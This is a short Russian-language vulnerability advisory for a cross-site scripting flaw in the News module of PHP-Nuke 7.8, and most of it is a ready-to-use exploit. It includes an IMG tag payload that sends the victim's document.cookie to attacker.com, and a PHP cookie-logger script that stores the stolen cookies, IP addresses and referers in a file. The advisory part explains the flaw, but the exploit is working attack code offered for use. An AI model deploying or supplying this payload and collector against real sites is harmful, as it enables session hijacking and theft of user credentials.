• Партнер

  • Программа: PHP-Nuke 7.8
     
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.

    Уязвимость существует из-за недостаточной обработки входных данных в теге IMG в
    поле "Story Text" модуля News. Удаленный пользователь может с помощью специально
    сформированного запроса выполнить произвольный код сценария в браузере жертвы в
    контексте безопасности уязвимого сайта.

    Эксплоит:

    ##Night_Warrior<Kurdihs Hacker>
    ##night_warrior771[at]hotmail.com
    ##Php-Nuke Pool and News Module IMG Tag Cross Site Scripting
    ##Contact :night_warrior771[at]hotmail.com
    Post Coment this Code:
    <img src="javascript:window.navigate ('http://attacker.com/cookies.php?c='+document.cookie);"

    cookies.php
    $cookie = $_GET['c'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("j F, Y, g:i a");
    $referer=getenv ('HTTP_REFERER');
    $fp = fopen('steal.php', 'a');
    fwrite($fp, '
    Cookie: '.$cookie.'
    IP: ' .$ip. '
    Date and Time: ' .$date. '
    Referer: '.$referer.' ');
    fclose($fp);
    ?>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии